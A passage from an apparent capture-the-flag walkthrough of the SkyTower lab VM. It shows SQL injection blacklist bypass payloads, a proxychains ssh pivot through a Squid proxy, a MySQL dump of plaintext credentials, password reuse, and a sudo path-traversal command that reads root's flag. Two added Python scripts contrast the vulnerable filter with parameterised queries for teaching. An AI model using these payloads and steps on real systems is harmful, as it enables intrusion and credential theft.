|<br />
| Ignored Files:<br />
============================================<br />
| Dynamic tests:<br />
| Plugin name: Learning New Directories v.1.2 Loaded.<br />
| Plugin name: FCKedior tests v.1.1 Loaded.<br />
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.<br />
| Plugin name: Find Backup Files v.1.2 Loaded.<br />
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.<br />
| Plugin name: Local File Include tests v.1.1 Loaded.<br />
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.<br />
| Plugin name: Remote Command Execution tests v.1.1 Loaded.<br />
| Plugin name: Remote File Include tests v.1.2 Loaded.<br />
| Plugin name: SQL-injection tests v.1.2 Loaded.<br />
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.<br />
| Plugin name: Web Shell Finder v.1.3 Loaded.<br />
| [+] 0 New directories added<br />
<br />
| FCKeditor tests:<br />
<br />
| Timthumb < 1.33 vulnerability:<br />
<br />
| Backup Files:<br />
<br />
| Blind SQL Injection:<br />
<br />
| Local File Include:<br />
<br />
| PHP CGI Argument Injection:<br />
<br />
| Remote Command Execution:<br />
<br />
| Remote File Include:<br />
| | <br />
| <b>SQL Injection:<br />
| [+] Vul [SQL-i] http://10.1.1.7/login.php<br />
| Post data: &email=123'&password=123 <br />
| [+] Vul [SQL-i] http://10.1.1.7/login.php <br />
| Post data: &email=123&password=123' </b><br />
| Cross-Site Scripting (XSS):<br />
| <br />
| <br />
| Web Shell Finder:<br />
====================================<br />
<br />
HTML report saved in: report/10.1.1.7.html<br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
attempted multiple SQL injection login bypass strings to no avail.
Additionally, I fired up the Tamper Data proxy browser plugin to gain
a bit more control over the session.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSTPu6n0KJPMCpl47lim6VMn3H59NR4vQ3Qtrcn7om1DauHOtM_zUSF-0HGYniA8kE6PHiMLR6fSWzeyGp6-IWrO9o8S9KKGxy_-7SKW8UOvKBIhXpjPAoqUUjXyrweoqIByjOZiveE3Li/s1600/Screenshot+from+2015-05-28+23%253A19%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSTPu6n0KJPMCpl47lim6VMn3H59NR4vQ3Qtrcn7om1DauHOtM_zUSF-0HGYniA8kE6PHiMLR6fSWzeyGp6-IWrO9o8S9KKGxy_-7SKW8UOvKBIhXpjPAoqUUjXyrweoqIByjOZiveE3Li/s400/Screenshot+from+2015-05-28+23%253A19%253A05.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Mildly
frustrated, I began a search for common SQL injection blacklist
bypass techniques. I found lots of information, maybe too much; but
eventually I stumbled upon an awesome whitepaper on the exploit-db
site </span></span></span></span></span></span><a href="https://www.exploit-db.com/papers/17934/" target="_blank">https://www.exploit-db.com/papers/17934/</a><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP0fP5dHF0c_RiJEaQE0m8n40Zwp84X_iJfu191A5ZcQn4CkZVo_KyERB_k4lQJvJYG8yWk9yf_dW4KyYj5D6n-M_FXMVlhuewt3dURixLSHpaqOG376cszNJObgtVIgonzwO97wNOEFAX/s1600/Screenshot+from+2015-05-28+23%253A26%253A11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP0fP5dHF0c_RiJEaQE0m8n40Zwp84X_iJfu191A5ZcQn4CkZVo_KyERB_k4lQJvJYG8yWk9yf_dW4KyYj5D6n-M_FXMVlhuewt3dURixLSHpaqOG376cszNJObgtVIgonzwO97wNOEFAX/s400/Screenshot+from+2015-05-28+23%253A26%253A11.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">From
the whitepaper I extracted this guidance:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">Here is a simple bypass using &&, || instead of and, or respectively.<br />
Filtered injection:<br />
1 or 1 = 1<br />
1 and 1 = 1<br />
Bypassed injection:<br />
1 || 1 = 1<br />
1 && 1 = 1</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
used this newfound information to attempt a bypass on the login
page. A bit of additional trial and error, mainly around the proper
terminating comment character (“--” or #), got me past the login
page:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3xlpQFTm6QFLpekXrbLK4hzvKYnoxP2v2rlOQW_862evcUyZVSiaWYAVP-kio6EpAiSqhKCJ-HXiG5qZ6D1goRp85U56P9MdpO68HZ10lyAGwhlOC8LTt1Jrj2OUbnCvY9oOAhLgTEJaS/s1600/Screenshot+from+2015-05-28+23%253A22%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3xlpQFTm6QFLpekXrbLK4hzvKYnoxP2v2rlOQW_862evcUyZVSiaWYAVP-kio6EpAiSqhKCJ-HXiG5qZ6D1goRp85U56P9MdpO68HZ10lyAGwhlOC8LTt1Jrj2OUbnCvY9oOAhLgTEJaS/s400/Screenshot+from+2015-05-28+23%253A22%253A21.png" width="390" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uxpzfOS9aaflwBjcBiYfsakxDq8EoSPGTG6A4NQZ4n2dR8Tpd2JNFI7pao0SepuB4XhLOLjFe4b7f4h-v8MfvDNEQThGT1EiBIpe1qEnkOLb4cO3Vq1oR8uywSuJUp5KnheUw8E_OvlA/s1600/Screenshot+from+2015-05-28+23%253A28%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2uxpzfOS9aaflwBjcBiYfsakxDq8EoSPGTG6A4NQZ4n2dR8Tpd2JNFI7pao0SepuB4XhLOLjFe4b7f4h-v8MfvDNEQThGT1EiBIpe1qEnkOLb4cO3Vq1oR8uywSuJUp5KnheUw8E_OvlA/s400/Screenshot+from+2015-05-28+23%253A28%253A26.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
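<div style="line-height: 100%; margin-bottom: 0in;">
The bypass above works because the login page tries to filter SQL keywords instead of keeping user input out of the query altogether. The Python script below is an added example written for this walkthrough; it is not code from the Sky Tower VM or from Telspace. It reconstructs a keyword blacklist in front of a string-built query, runs Uniscan's single-quote probe (123') and a classic "or" bypass through it, and compares the outcome with a parameterised query. The user table, the credentials and the blacklist regex are all constructed assumptions, since the VM's PHP source is not shown in the post. One caveat: SQLite treats || as string concatenation, whereas MySQL treats it as OR by default (which is why the whitepaper's trick worked on this VM), so the script does not reproduce the || bypass; what it shows is that the filter leaves the underlying injection, including the verbose database error seen earlier, completely untouched.</div>

```python
import re
import sqlite3

# Keyword blacklist of the kind the Sky Tower login page appears to use:
# it rejects the words "or" / "and" and nothing else.  Reconstructed from
# the post's observations; the real filter is an assumption.
BLACKLIST_RE = re.compile(r"\b(or|and)\b", re.IGNORECASE)


def blacklist_allows(value: str) -> bool:
    """True when the naive filter would let this input through."""
    return BLACKLIST_RE.search(value) is None


def make_db() -> sqlite3.Connection:
    """Constructed sample user table (hypothetical credentials, not the VM's).

    The password is stored in clear for brevity; a real application stores
    a salted password hash and compares against that instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)", ("user@example.com", "example-password")
    )
    conn.commit()
    return conn


def login_blacklist_concat(conn: sqlite3.Connection, email: str, password: str) -> str:
    """Vulnerable pattern: blacklist in front of a string-built query.

    Returns "blocked" (filter fired), "ok:<email>", "denied" or "error:<msg>".
    The "error:" branch is the verbose database error the post provoked with
    a single quote; the blacklist does nothing to prevent it.
    """
    if not (blacklist_allows(email) and blacklist_allows(password)):
        return "blocked"
    sql = "SELECT email FROM users WHERE email = '%s' AND password = '%s'" % (
        email,
        password,
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return "error:" + str(exc)
    return "ok:" + row[0] if row else "denied"


def login_parameterised(conn: sqlite3.Connection, email: str, password: str) -> str:
    """Fixed pattern: bound parameters, so input is data and never SQL."""
    row = conn.execute(
        "SELECT email FROM users WHERE email = ? AND password = ?", (email, password)
    ).fetchone()
    return "ok:" + row[0] if row else "denied"


def compare(email: str, password: str) -> tuple:
    """Run one set of credentials through both logins, fresh database each time."""
    conn = make_db()
    return (
        login_blacklist_concat(conn, email, password),
        login_parameterised(conn, email, password),
    )


if __name__ == "__main__":
    for creds in [
        ("user@example.com", "example-password"),  # legitimate login
        ("x' or '1'='1", "x"),                     # classic bypass: the blacklist catches this one
        ("123'", "123"),                           # Uniscan's probe: filter passes it, query breaks
    ]:
        print(creds, "->", compare(*creds))
```

<div style="line-height: 100%; margin-bottom: 0in;">
The parameterised version needs no blacklist at all: the same inputs simply fail to match a row, nothing the caller sends can change the statement's structure, and the database never raises the kind of error that revealed its type in the screenshot above.</div>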
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Ignoring
the filtered status of port 22, I attempted an unsuccessful
connection:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7rKM9i8YdRbnRRj8aSLjRBWxvnI8NBRk9YrMohHVpSUlG3DMwUCeu9OZedlCRlkMqCCXNCNYOKwS6HA6_qS3IbbOngHlfSelJMb-D4Ot6tmlZM6760MQnfhrPd11ZYTC0GfRg04KnnerN/s1600/Screenshot+from+2015-05-28+23%253A34%253A47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7rKM9i8YdRbnRRj8aSLjRBWxvnI8NBRk9YrMohHVpSUlG3DMwUCeu9OZedlCRlkMqCCXNCNYOKwS6HA6_qS3IbbOngHlfSelJMb-D4Ot6tmlZM6760MQnfhrPd11ZYTC0GfRg04KnnerN/s400/Screenshot+from+2015-05-28+23%253A34%253A47.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Taking
the Squid http proxy approach, I decided to attempt to connect using
Proxychains. I'd recently performed a similar hack in the Offensive
Security OSCP lab, so it wasn't totally foreign to me. I modified
/etc/proxychains.conf to connect to the victim machine on port 3189.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcXkF_vnYwyLZR6PfsjOXYaj1ILKltk0o1OGTmJwV1KMVuVIpyh5O3DTcIBqLNt9X9HtqVKIHY7omDNpckiZsudBY0wPfhP3ZJ72MU3YZTZFfgxhI80iYgbqSc3xHCFxKo9RWUEhhQemt/s1600/Screenshot+from+2015-05-28+23%253A50%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidcXkF_vnYwyLZR6PfsjOXYaj1ILKltk0o1OGTmJwV1KMVuVIpyh5O3DTcIBqLNt9X9HtqVKIHY7omDNpckiZsudBY0wPfhP3ZJ72MU3YZTZFfgxhI80iYgbqSc3xHCFxKo9RWUEhhQemt/s1600/Screenshot+from+2015-05-28+23%253A50%253A13.png" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Proxychains
was able to successfully connect on the machine's ssh port using the
obtained credentials:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# proxychains ssh john@10.1.1.7<br />
ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
The
authenticity of host '10.1.1.7 (10.1.1.7)' can't be
established.<br />
ECDSA key fingerprint is
f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.<br />
Are you sure
you want to continue connecting (yes/no)? yes<br />
Warning:
Permanently added '10.1.1.7' (ECDSA) to the list of known
hosts.<br />
john@10.1.1.7's password: <br />
Linux SkyTower
3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64<br />
<br />
The programs
included with the Debian GNU/Linux system are free software;<br />
the
exact distribution terms for each program are described in
the<br />
individual files in /usr/share/doc/*/copyright.<br />
<br />
Debian
GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the
extent<br />
permitted by applicable law.<br />
Last login: Fri Jun 20
07:41:08 2014<br />
<br />
Funds have been withdrawn<br />
Connection to
10.1.1.7 closed.<br />
root@kali:~# <br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Upon connection the session prints “Funds have been withdrawn” and closes immediately; however, I was still able to execute single commands over ssh by passing them on the command line. With this ability I could continue system enumeration, attempt a reverse shell, try to escape whatever keeps shutting the shell down on connection, and so on.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Issuing a “/bin/sh -i” command this way gave me a more persistent shell, but one without job control. Afraid that this would restrict something I wanted to do, I opted instead to deal with the .bashrc file in john's home directory, which is what kills the interactive session:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password: <br />
total 24<br />
drwx------ 2 john john 4096 Jun 20 2014
.<br />
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..<br />
-rw------- 1
john john 7 Jun 20 2014 .bash_history<br />
-rw-r--r-- 1 john john
220 Jun 20 2014 .bash_logout<br />
-rw-r--r-- 1 john john 3437 Jun 20
2014 .bashrc<br />
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I simply renamed the .bashrc file to break its influence on my session. Whatever had been appended to it only fires in an interactive shell, which is why the single-command form of ssh kept working while a normal login was thrown out, and why the rename itself could be done that way.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc
bashrc.bak"<br />
ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password:
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Finally
got a solid shell:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">ProxyChains-3.1
(http://proxychains.sf.net)<br />
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK<br />
john@10.1.1.7's
password: <br />
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2
x86_64<br />
<br />
The programs included with the Debian GNU/Linux
system are free software;<br />
the exact distribution terms for each
program are described in the<br />
individual files in
/usr/share/doc/*/copyright.<br />
<br />
Debian GNU/Linux comes with
ABSOLUTELY NO WARRANTY, to the extent<br />
permitted by applicable
law.<br />
Last login: Thu May 28 23:52:47 2015 from
10.1.1.7<br />
john@SkyTower:~$
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Poking around on the system, I took a look at login.php in the web root under /var/www and found hardcoded MySQL credentials:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3lb8DvJ_7TRxtlXPmi-rrjUGp1tIfUgBYckNzoaUKU5gIQA5LhyphenhyphenJWsJTnIcbaJkpKauTISdWc9SVhm_zIif4oSTA_JpY_WHtNxc0ZMZCF9eMQpH_2Os5x_wlk9ZMlt1m9Pb_VBEo8WYwv/s1600/Screenshot+from+2015-05-29+00%253A33%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3lb8DvJ_7TRxtlXPmi-rrjUGp1tIfUgBYckNzoaUKU5gIQA5LhyphenhyphenJWsJTnIcbaJkpKauTISdWc9SVhm_zIif4oSTA_JpY_WHtNxc0ZMZCF9eMQpH_2Os5x_wlk9ZMlt1m9Pb_VBEo8WYwv/s400/Screenshot+from+2015-05-29+00%253A33%253A06.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I also found the pesky culprit behind our SQL injection auth bypass quirks: a keyword blacklist applied with str_ireplace, after which the “cleaned” input is concatenated straight into the query:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">$sqlinjection = array("SELECT", "TRUE",
"FALSE", "--","OR", "=",
",", "AND", "NOT");<br />
$email =
str_ireplace($sqlinjection, "",
$_POST['email']);<br />
$password = str_ireplace($sqlinjection, "",
$_POST['password']);<br />
<br />
$sql= "SELECT * FROM login where
email='".$email."' and
password='".$password."';";<br />
$result =
$db->query($sql);</td>
</tr>
</tbody></table>
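<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
To show why that blacklist is only a speed bump, here is an added example of my own in Python; it is not code from the SkyTower image or from the original post. It reproduces the filter with the same sequential, case-insensitive, single-pass semantics as PHP's str_ireplace, builds the query by the same string concatenation, and runs it against an in-memory SQLite table standing in for the SkyTech login table. The rows, e-mail addresses and passwords are constructed sample data. It demonstrates three things: the textbook “' OR 1=1 --” payload is mangled, a doubled keyword (“oorr”) survives because nothing is rescanned after a removal, and a parameterised query treats the very same payload as a plain string. The bypass payload is deliberately built without “#”, which MySQL treats as a comment but SQLite does not, so the query evaluates the same way on both engines.</div>

```python
import re
import sqlite3

# Blacklist exactly as it appears in SkyTower's login.php above.
SQL_BLACKLIST = ["SELECT", "TRUE", "FALSE", "--", "OR", "=", ",", "AND", "NOT"]


def strip_blacklist(value: str) -> str:
    """Reproduce PHP's str_ireplace($sqlinjection, "", $value).

    Each token is removed case-insensitively in one left-to-right pass,
    token after token, and nothing is rescanned afterwards.  A keyword that
    is reassembled by a removal ("oorr" -> "or") therefore survives.
    """
    for token in SQL_BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def build_vulnerable_query(email: str, password: str) -> str:
    """The same string concatenation login.php performs after filtering."""
    return ("SELECT * FROM login where email='" + strip_blacklist(email)
            + "' and password='" + strip_blacklist(password) + "';")


def vulnerable_login(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """login.php's logic: any row coming back counts as a successful login."""
    return len(conn.execute(build_vulnerable_query(email, password)).fetchall()) > 0


def safe_login(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """The fix: bind parameters, so input can never become SQL syntax.
    (Plaintext passwords are kept only to stay comparable with the original.)"""
    rows = conn.execute(
        "SELECT * FROM login WHERE email = ? AND password = ?", (email, password)
    ).fetchall()
    return len(rows) > 0


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the SkyTech login table (rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO login (email, password) VALUES (?, ?)",
        [("alice@example.test", "winter2015"), ("bob@example.test", "hunter2")],
    )
    return conn


def collateral_damage_demo(conn: sqlite3.Connection) -> bool:
    """Side effect of the blacklist: a legitimate password containing "or"
    ("horsepower" -> "hsepower") is mutilated before the comparison, so the
    real user can never log in through the vulnerable code path."""
    conn.execute("INSERT INTO login (email, password) VALUES (?, ?)",
                 ("carol@example.test", "horsepower"))
    return vulnerable_login(conn, "carol@example.test", "horsepower")


# The textbook payload is mangled: "OR", "=" and "--" are all stripped.
NAIVE = "' OR 1=1 --"
# Doubled keywords collapse back into the keyword after a single pass, and the
# payload needs no "=", "--" or ",".  Its trailing quote pairs with the closing
# quote of the template, so "... and password='x'" stays syntactically valid.
# On MySQL (the page's target) and SQLite alike, "email='' or 1 or '' and ..."
# evaluates to true for every row.
BYPASS = "' oorr 1 oorr '"


if __name__ == "__main__":
    conn = demo_db()
    print(repr(strip_blacklist(NAIVE)))          # "'  11 "  -> payload destroyed
    print(repr(strip_blacklist(BYPASS)))         # "' or 1 or '"
    print(build_vulnerable_query(BYPASS, "x"))
    print(vulnerable_login(conn, BYPASS, "x"))   # True: filter bypassed
    print(safe_login(conn, BYPASS, "x"))         # False: treated as a literal
    print(collateral_damage_demo(conn))          # False: legitimate user locked out
```

The takeaway for the fix is not a longer blacklist: any keyword list can be defeated by doubling, case tricks or an operator it forgot (“||” is not in this one either), and it damages legitimate input along the way. Binding parameters removes the problem entirely; hashing the stored passwords is the second change this code needs.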
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Using the database credentials from login.php, I logged in to MySQL and dumped the login table, which stores every user's e-mail address and password in plaintext:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">john@SkyTower:/var/www$ mysql --user=root --password=root
SkyTech<br />
Reading table information for completion of table and
column names<br />
You can turn off this feature to get a quicker
startup with -A<br />
<br />
Welcome to the MySQL monitor. Commands
end with ; or \g.<br />
Your MySQL connection id is 2288<br />
Server
version: 5.5.35-0+wheezy1 (Debian)<br />
<br />
Copyright (c) 2000,
2013, Oracle and/or its affiliates. All rights reserved.<br />
<br />
Oracle
is a registered trademark of Oracle Corporation and/or
its<br />
affiliates. Other names may be trademarks of their
respective<br />
owners.<br />
<br />
Type 'help;' or '\h' for help. Type
'\c' to clear the current input statement.<br />
<br />
mysql>
<br />
<br />
<br />
-----------------------------------------------------------------------------------------------------------------------------------------------<br />
<br />
mysql>
use SkyTech;<br />
Database changed<br />
<br />
mysql> select * from
login;<br />
+----+---------------------+--------------+<br />
| id |
email | password |<br />
+----+---------------------+--------------+<br />
|
1 | john@skytech.com | hereisjohn |<br />
| 2 | sara@skytech.com |
ihatethisjob |<br />
| 3 | william@skytech.com | senseable
|<br />
+----+---------------------+--------------+<br />
3 rows in set
(0.00 sec)<br />
<br />
mysql>
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Giving the e-mail addresses and passwords from the login table a try for system login worked out for me: sara's database password was also her system password. She had limited sudo access that allowed her to run ls and cat only on a restricted set of paths under /accounts. Because sudo matches the argument as typed rather than the path it resolves to, /accounts/../root/ walks straight out of that directory, so I used it to list root's home directory and cat the flag.txt file:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">sara@SkyTower:~$ sudo ls
/accounts/../root/<br />
flag.txt<br />
sara@SkyTower:~$ sudo cat
/accounts/../root/flag.txt<br />
Congratz, have a cold one to
celebrate!<br />
root password is theskytower<br />
<br />
<br />
